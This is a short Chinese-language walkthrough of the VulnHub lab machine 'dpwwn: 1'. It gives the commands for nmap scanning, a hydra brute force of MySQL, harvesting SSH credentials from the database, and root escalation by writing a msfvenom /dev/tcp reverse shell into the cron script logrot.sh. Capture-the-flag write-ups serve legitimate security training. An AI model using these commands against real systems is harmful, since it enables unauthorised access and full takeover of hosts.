dpwwn: 1
靶机地址:http://www.vulnhub.com/entry/dpwwn-1,342/
靶机难度:初级
nmap扫描获取靶机IP:192.168.40.133
nmap -sP 192.168.40.*
获取靶机的开放的端口,扫描结果开放了22、80、3306端口
nmap -sV -sC -p- 192.168.40.133
用dirb扫描该靶机的目录,发现了info.php
但是仍然没有太大发现,服务器还开放了3306端口,那就尝试远程登入mysql,用hydra爆破了一下,结果密码为空,23333
hydra -l root -P /usr/share/wordlists/rockyou.txt -en -f mysql://192.168.40.133
远程登入mysql,在数据库发现了ssh这个库,里面应该是保持着系统的用户密码
mysql -h 192.168.40.133 -uroot
获取ssh库的数据
use ssh select * from users;
用ssh账号密码登入靶机系统
ssh mistic@192.168.40.133
logrot.sh这个脚本是定时任务,意味着可以写入反弹shell来提权
用kali的msfvenom生成一个反弹shell
msfvenom -p cmd/unix/reverse_bash lhost=192.168.40.129 lport=2333
然后重定向到logrot.sh
echo "0<&86-;exec 86<>/dev/tcp/192.168.40.129/2333;sh <&86 >&86 2>&86" > logrot.sh
在kali上监听2333端口
nc -lvvp 2333
等待定时任务执行logrot.sh就可以获取root权限的反弹shell